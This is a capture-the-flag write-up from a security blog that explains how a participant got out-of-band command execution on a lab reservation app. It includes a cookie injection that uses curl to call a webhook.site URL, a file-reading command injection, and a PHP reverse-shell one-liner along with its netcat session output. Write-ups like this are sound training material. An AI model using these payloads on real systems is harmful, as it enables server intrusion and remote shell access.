Out-of-Band Remote Command Execution Challenge Write-up | VULLNERABILITY

Out-of-Band Remote Command Execution Challenge (Write-up)

As the world's leading cyber threat service, we decided to create cybersecurity challenges to take attention to new bypass techniques and methods. We have created our first challenge on 13.05.2020, a total of 38 researchers solved this and we have listed them on our challenges page. As we promised, one of those researchers (Sivanesh Ashok - @sivaneshashok) has won the PentesterLab subscription for 3 months.

In our first challenge, we have focused on remote command execution ad out-of-band exploitation techniques. One of the participants, Hakkı Dizdar aka enjloezz, hasn't broken us and accepted our cooperation: wrote a write-up for this challenge and we are publishing this for you as a guide. Thanks to Hakkı, let us learn how he solved this challenge.

We are with you, enjloezz

Hello, this is enjloezz and today we will be looking at the "Out-of-band Remote Command Execution" challenge. First of all many thanks to the VULLNERABILITY team. It was a great distraction from my homework. :)

Thanks to challenge name we know its RCE it narrows our perspective. The first thing we do is trying to figure out how it's working, what's the mechanism behind it, how we can exploit it? To be able to answer these questions you need to use this app as intended. It's really a basic reservation app for a restaurant. You enter your name, choose a table and you got a reservation.


OOB RCE Challenge 1

The next thing to do is looking at the receipt if something interesting there.


OOB RCE Challenge 2

Receipt URL: https://lab.takeover.host/receipts/username_receiptcode

To test if its static file or not I tried some extensions like php, txt, html and txt is worked. So our file name is: username_receiptcode.txt That's good to know but there is nothing more useful, back to basics look at HTTP requests find out which programming language they are using to create an attack vector.

Content-type: text/html; charset=UTF-8
Date: Wed, 13 May 2020 21:01:28 GMT
Ms-Author-Via: DAV
Server: nginx
Set-Cookie: name=test
Status: 200
X-Powered-By: PHP/7.4.5
X-Powered-By: PleskLin

PHP 7.4.5, nginx and Plesk good to know. Another useful thing in response headers is the Set-Cookie header which contains my name. Let's look at our cookies maybe there is more useful than the name. We are getting closer to understanding the mechanism. They are using file storage instead of a database and they are storing entered values in a txt file. The next step is fuzzing parameters.

Since it is known vulnerability is OOB RCE we can start by blind RCE techniques such as sending HTTP, DNS, ICMP requests. I had used webhook.site for testing HTTP payloads. I have deleted the 'reserved' cookie and edited my 'name' cookie.

Payload: name=`curl https://webhook.site/b2458f08-4b7f-490f-ba2b-e99d8e3cbdce`

Finally, I could capture the incoming request:

OOB RCE Challenge 3

We successfully got command execution on the target server. We can simply read flag in receipt page or we can get a reverse shell, it's your choice.

  • Reading the flag without getting a reverse shell
  • What will happen if we enter the payload instead of the table parameter in cookie? Let us change the 'table' cookie as table=`find / -name flag.txt -exec cat {} \;`

    Bummm, the receipt file has changed and server printed the content of flag.txt as table name:

    OOB RCE Challenge 3

  • Getting a reverse shell and reading the flag
  • For getting reverse shell we can use the information we gather before they are using PHP 7.4.5, nginx and Plesk. With little search we figured out Plesk's PHP binary path and using this we can get a reverse shell.

    PHPBIN location: /opt/plesk/php/7.4/bin/php

    Our payload: table=`/opt/plesk/php/7.4/bin/php -r '$sock=fsockopen("ip",port);exec("/bin/sh -i <&3 >&3 2>&3");'`

    Its output in my computer:

    C:\Users\enjloezz> nc -nvlp 4444
    listening on [any] 4444 ...
    connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 60817
    sh: no job control in this shell
    sh-4.2$ id
    id
    uid=10000(normaluser) gid=1004(psacln) groups=1004(psacln) context=system_u:system_r:unconfined_service_t:s0
    sh-4.2$ find / -name flag.txt -exec cat {} \;
    VULLN{FOUND_FLAG_GIVE_ME_THE_LAB}
    


    That's it for today. Thanks to VULLNERABILITY and good luck on PentesterLab. :)

    Do you have any questions or suggestions? Feel free to contact me via Discord: enjloezz#7444

    Alternative Write-ups

    There are lots of methods to solve this challenge! Alternatively, Aqeel Asif aka Ciph3r00t wrote a very-detailed write-up and Ozan Agdepe of VULLNERABILITY team has recorded a video for this.

    Read Ciph3r00t's awesome write-up: CTF — Out-Of-Band RCE Solution by Ciph3r00t

    Thanks to Ozan Agdepe, you can watch his video.

    Also, we would like to thank PentesterLab for their sponsorship to this challenge. Of course, special thanks to all participants! :)




    Date:  May 17, 2020